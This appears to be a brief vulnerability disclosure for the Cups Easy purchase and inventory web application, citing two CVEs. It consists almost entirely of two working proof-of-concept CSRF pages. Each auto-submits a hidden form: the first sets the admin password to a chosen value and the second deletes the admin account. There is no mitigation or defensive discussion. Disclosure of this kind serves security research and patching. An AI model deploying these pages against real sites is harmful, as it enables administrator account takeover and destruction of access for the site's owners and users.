The Cups Easy (Purchase & Inventory) Web Appliction is vulnerable to CSRF that leads to admin (or arbitrary) account takeover or deletion

CVE 2020-8425 CVE 2020-8424

Source for the Application: https://sourceforge.net/projects/cupseasy/files/cupseasylive-1.0/

Proof of Concept code to initiate the Password Change:

<html>

  <body>

  <script>history.pushState('', '', '/')</script>

    <form action="http://SITEADDRESS/cupseasylive/passwordmychange.php" method="POST">

      <input type="hidden" name="username" value="admin" />

      <input type="hidden" name="password" value="password1234" />

      <input type="hidden" name="change" value="Change" />

      <input type="submit" value="Submit request" />

    </form>

    <script>

      document.forms[0].submit();

    </script>

  </body>

</html>



<html>

Proof Of Concept Code for the Account deletion

<body>


  <script>history.pushState('', '', '/')</script>


    <form action="http://SITEADDRESS/cupseasylive/userdelete.php" method="POST">


      <input type="hidden" name="username" value="admin" />


      <input type="hidden" name="delete" value="Delete" />


      <input type="submit" value="Submit request" />


    </form>


    <script>


      document.forms[0].submit();


    </script>


  </body>


</html>